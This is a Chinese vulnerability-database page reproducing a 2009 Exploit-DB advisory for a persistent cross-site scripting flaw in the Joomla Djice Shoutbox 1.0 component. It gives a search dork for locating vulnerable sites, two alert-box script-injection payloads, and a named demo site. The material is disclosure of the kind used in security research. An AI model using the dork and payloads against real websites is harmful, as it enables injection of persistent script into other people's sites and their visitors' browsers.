Joomla! Component Djice Shoutbox 1.0 - Persistent Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057553 漏洞类型
发布时间 2009-03-10 更新时间 2009-03-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8197
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
############################################
#  Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability  #
############################################
 
- dork: inurl:"index.php?option=com_djiceshoutbox"
 
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
 
"><script>alert('XaDoS')</script>
 
or

'">><script>alert('XSS By XaDoS')</script>
 
the XSS become permanent in every page of site!
not critical damage but it's not funny..
 
[+] D3M0:
 
http://www.djiceatwork.com
 
contact me at xados @ hotmail . it
www.securitycode.it

# milw0rm.com [2009-03-10]